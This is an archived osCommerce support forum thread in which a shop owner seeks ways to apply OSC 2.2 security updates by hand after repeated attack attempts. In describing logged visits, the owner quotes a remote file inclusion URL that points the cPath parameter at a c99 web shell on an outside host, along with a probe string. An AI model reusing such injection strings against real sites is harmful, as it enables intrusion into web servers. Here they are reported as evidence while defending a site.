Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

How do I upgrade my current install of OSC for security reasons?


Guest

Recommended Posts

I've been dealing with hack-attempts for a month by a variety of different people.

 

I need to upgrade my current version of OSC 2.2 for the latest security fixes.

 

When I login to Cpanel, I can see there is a link to update my version of OSC 2.2. But, when I click on it, I get this warning:

 


Click on Upgrade only if
- no files, languages, themes have been modified
- you haven't added mods to this installation of OS Commerce
Info: Your current installation will be backed up.

Click on Upgrade in order to proceed.[/code]

 

Well, obviously I'm scared to death to click Upgrade as I have a number of contribs and damn near everything has been changed or modified from the stock install of OSC. What do I do?

 

Panicked this evening...again...when I was visiting my Who's Online feature in Admin and saw all kinds of crazy URLs attached to my website that had nothing to do with my website. Webhost said:

 

There is cross-site scripting vulnerability in the index.php script. So, they did something. Disabled the ability to do it via their Apache server. But, they're encouraging me to update the script for OSC. And, I'm afraid to do it via Cpanel. Where should I look for security fixes that I could manually install myself?

Link to comment
Share on other sites

I've been dealing with hack-attempts for a month by a variety of different people.

any evidence? how? set the chmod on index.php 755 or 644(depends on webhost)

 

first you need to compare files using utility like WinMerge, as I believe you have some contributions installed and after that you can load the new files.

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

Link to comment
Share on other sites

If you mean...how am I catching this? I'm seeing it in the Who's Online feature in Admin. I'll give you an example, of what I saw last night. The URL they were sitting on read something like this:

 

www.MYSITE.com/index.php?cPath=http://www.THEIRSITE.net/c99.php?

 

Saw another interesting one, too. Different, but...interesting, nonetheless, as no such URL should be generated.

 

www.mysite.com/product_info.php?products_id=1916{5}5

 

That appendage on the end of the URL of {5}5 is what's interesting.

 

The first URL appeared to take me to what LOOKED like my website...yet no such page exists. Header looked good. Left column and footer looked good. What they had done, was take really grainy, blurry screenshots (I guess) of the gifs that accompany each main or parent category in my site and assembled them all on one page as clickable links to the main categories the photos represent. Very bizarre.

 

The second URL, the one with the {5}5 on the end of it, took me to that particular product in my site and nothing looked out of sorts at all. I don't know what these people are attempting to do.

 

This happened to me a few weeks ago with a different website, doing something similar to the the first URL I posted...where the link turned into one with their own URL attached on the end of it. Webhost did something then, but...whatever it was wasn't enough as there came the next one last night.

 

I've heard the horror stories about websites being hijacked and redirected to porn sites, but I don't understand what these 'hackers' are trying to do with my site.

 

first you need to compare files using utility like WinMerge, as I believe you have some contributions installed and after that you can load the new files.

 

What my webhost has set up is some kind of auto-install feature for this upgrade. In other words, if I click the Upgrade button...it's done. I don't get to see the files first. The upgrade will simply write over my existing files and I cannot do that.

Perhaps I'll write to them and see if they can provide me with the upgrade files and go from there.

Link to comment
Share on other sites

Is this the latest update for OSC 2.2?

 

osCommerce 2.2 Milestone 2 Update 060817

 

If it is, I'll be able to use this just like a contribution...and edit the files manually.

 

Webhost can't give me a breakdown of what files are included in their update. All they can do is suggest I install it somewhere else and do a file compare.

 

But, if that link above is the latest and greatest update, I'll use that.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...